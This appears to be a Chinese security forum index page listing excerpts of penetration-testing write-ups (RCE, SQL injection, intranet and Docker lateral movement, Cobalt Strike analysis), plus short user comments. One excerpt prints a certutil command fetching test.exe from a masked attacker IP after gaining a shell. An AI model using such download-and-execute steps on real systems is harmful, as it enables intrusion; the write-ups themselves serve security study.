排序
网络资产测绘神器:AsamF聚合工具详解
工具简介: AsamF是一款集成多个网络资产测绘平台的搜索工具 AsamF,Asset survey and mapping 本程序仅供学习研究使用,请勿利用本程序损害任何个人或企业的利益,造成一切影响,开发者将不承...
SRC挖掘实战:探寻莫名其妙的漏洞及解决方案
前言 真实案例,文中所写漏洞现已经被修复,厚码分享也是安全起见,请各位大佬见谅哈! 案例一:奇怪的找回密码方式 某次漏洞挖掘的过程中,遇到某单位的登录框,按以往的流程测试了一下发现并...
攻防实战:一次顺畅的案例分析
真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。 金蝶云星空RCE shell之后尝试上线(出网)certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe这里exe的...
发掘潜在的 Oracle 数据库注入漏洞
因为需要具体数据,所以要深入利用,手工肯定不方便,所以直接上 Sqlmap: Sqlmap也可以扫出该注入点,但想要进一步查询数据时,却发现Sqlmap利用不起来,无法查出数据: 为了确定查询数据失败原...
内网渗透攻击技巧:突破云镜传递防护
外网打点 信息搜集 FTP匿名登录 发现有FTP匿名登录,连接查看 漏洞探测 搜索Xstream漏洞,发现 https://www.cnblogs.com/thelostworld/p/14810682.html 尝试CVE-2021-29505 反弹shell &n...
攻防实战:一次演练总结及经验分享
0x01 外网打点 资产发现 多测绘平台搜索 https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/ 多语法搜索 假如某个目标站点为xxxx.com ,我们可以通过不同的语法进行资产搜集...
利用Veinmind和Jenkins实现零成本的自动化扫描方案
在 CI 集成各种安全能力的过程中,最为痛苦的便是面对成千上百的仓库和分支,需要手动修改各种配置文件来加入安全扫描的步骤;通常情况下,在 Jenkins CI 过程内想要引入容器安全检测,需要手动...
从零开始的内存马分析:掌握骑马反杀的技巧
第三天,你看着windowsConfig.jsp,config.jsp,心里想着,可算抓到你了,这回要把你全部,全部都属于我,可是,当你正兴高采烈逐步分析的时候,却发现,自己的数据库早已沦陷。。。 0x00 序言 ...
攻防之战:深度回顾地级市某行业专项演练
2022.8.X单位突然通知参与某行业专项攻防演练,本着学习的目的参与了一波,特此记录。 1、打点 获得目标单位名称 先通过爱企查、天眼查等工具查询目标及目标下属单位信息 可以利用工具:ENEScan...
深入挖掘内网:域内信息收集与渗透攻击(上)
一、内网信息收集概述 进入内网后,首先需要对当前网络环境进行判断:• 我是谁:当前机器的角色• 这是哪:当前机器所处网络环境的拓扑结构 主要信息: 本机信息收集基础信息:内网网段信息,...
x微前台绕过鉴权执行sql分析
https://forum.butian.net/share/1892 /formmodel/mobile/mec/servlet/MECAdminAction.java /formmodel/mobile/manager/MobileUserInit.java /mobile/plugin/ecology/service/AuthService.java&...
Docker虚拟机横向移动渗透测试实战经验分享
本次渗透在几个docker虚拟机间多次横向移动,最终找到了一个可以进行docker逃逸的出口,拿下服务器。渗透过程曲折但充满了乐趣,入口是172.17.0.6的docker虚拟机,然后一路横向移动,最终在172....
Cobalt Strike 4.0:深入探讨 PowerShell 上线分析的实战经验
0x00 本文主要分析内容 1、CS powershell上线过程分析2、powershell shellcodeloader分析3、shellcode内容4、dll注入相关内容5、ReflectDllInjection技术分析 0x01 生成攻击payload: CS通过Art...
给你的爱一直很安静「魔法师」 36天前1
不好用找你了波a963263 4个月前0
试一下看看a963263 4个月前0
感谢分享使用a963263 4个月前1
感谢分享zjy2931 4个月前0
1111152xuexi 4个月前0
6666skylake_core 4个月前1
感谢分享L1121 4个月前0
可以批量上架商品吗